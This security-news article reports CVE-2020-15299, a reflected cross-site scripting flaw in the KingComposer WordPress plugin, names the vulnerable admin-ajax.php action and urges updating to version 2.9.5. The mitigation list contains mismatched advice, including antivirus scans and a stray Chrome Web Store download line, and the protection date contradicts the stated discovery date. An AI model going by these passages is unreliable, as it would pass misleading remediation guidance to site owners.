computer Security

XSS Flaw Impacting 100,000 WordPress Sites – Update Now!!

Recently, a critical threat has been discovered by the threat intelligence team of Wordfrence; this threat is a reflected cross-site scripting (XSS) vulnerability, that has been traced as CVE-2020-15299, in the KingComposer WordPress plugin.

According to security reports, this vulnerability has impacted nearly 100,000 websites, as the KingComposer is an active drag-and-drop page developer plugin for WordPress websites that evolves completely with top-notch features installed and an intuitive UI.

This vulnerability was discovered on June 25 and operates in the Ajax functions that are used by the plugin to complete page builder characteristics. However, one of the Ajax functions were not in current use, yet it can be installed by assigning a POST application to a script named admin-ajax.php with an operation parameter set to kc_install_online_preset.

Reflected Cross-Site Scripting (XSS)

  • Affected Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme
  • Description: Reflected Cross-Site Scripting(XSS)
  • Plugin Slug: kingcomposer
  • Affected Versions: < 2.9.5
  • CVE ID: CVE-2020-15299
  • CVSS Score: 6.1(medium)

The reflected cross-site scripting XSS vulnerabilities have both features of XXSS and CSRF. Like a CSRF initiative, using a reflected XSS vulnerability typically depends on the attacker deceiving their victim into agreeing with a malicious link that sends the victim to the unsafe site with a malicious payload. 

This procedure can be done in several ways, but, still, it is prevalent to go with the first link to an average site that is managed by the threat actors, once they get control over the website they send a request that contains a malicious payload to the vulnerable site on behalf of the victim.

If the XSS attacks are stored, the malicious payload will be administered in the victim’s browser. But in the case of reflected XSS, the vulnerable site would quickly output, or we can say that it will reflect the malicious JavaScript payload that would be administered in a single time in the victim’s browser instead of being collected in the database for later accomplishment.

Measures to Avoid This Security Flaw

  • Personal home users can run or install anti-virus in their devices to avoid vulnerability.
  • Office users or if the users are operating through a shared network, then the user can ask the network administrator to do a scan across the network looking for misconfigured or contaminated devices.
  • There is another way that will help you to prevent this kind of vulnerability, download the version 2.0 now from the Chrome Web Store.

According to the security report of the threat intelligence team of Wordfrence, this XSS vulnerability has been thoroughly covered in version 2.9.5. So, they strongly suggest the user update their existing version to the latest one as soon as possible.

Since June 15, 2020, the sites running Wordfence Premium have been guarded against this vulnerability, as well as the earlier vulnerabilities in the KingComposer plugin.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Also Read:

Top 10 Vulnerability Assessment and Penetration Testing (VAPT) Tools 2020

Cisco Webex Meetings Flaw Let Hackers to Gain Access to Sensitive Information on Vulnerable System

Zoom Suddenly Announced End-to-End Encryption for Free Users

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Bondnet Using High-Performance Bots For C2 Server

Threat actors abuse high-performance bots to carry out large-scale automated attacks efficiently. These bots can…

18 hours ago

Discord-Based Malware Attacking Orgs Linux Systems In India

Linux systems are deployed mostly in servers, in the cloud, and in environments that are…

18 hours ago

New Moonstone Sleet North Korean Actor Deploying Malicious Open Source Packages

In December 2023, we reported on how North Korean threat actors, particularly Jade Sleet, have…

21 hours ago

Life360 Breach: Hackers Accessed the Tile Customer Support Platform

Life360, a company known for its family safety services, recently fell victim to a criminal…

22 hours ago

Microsoft Delays Release of Controversial Windows AI Recall Tool Amid Privacy Concerns

Microsoft has announced that it will delay the broad release of its AI-powered Recall feature…

1 day ago

SmokeLoader – A Modular Malware With Range Of Capabilities

Hackers misuse malware for diverse illicit intentions, including data theft, disrupting systems, espionage, or distortion…

2 days ago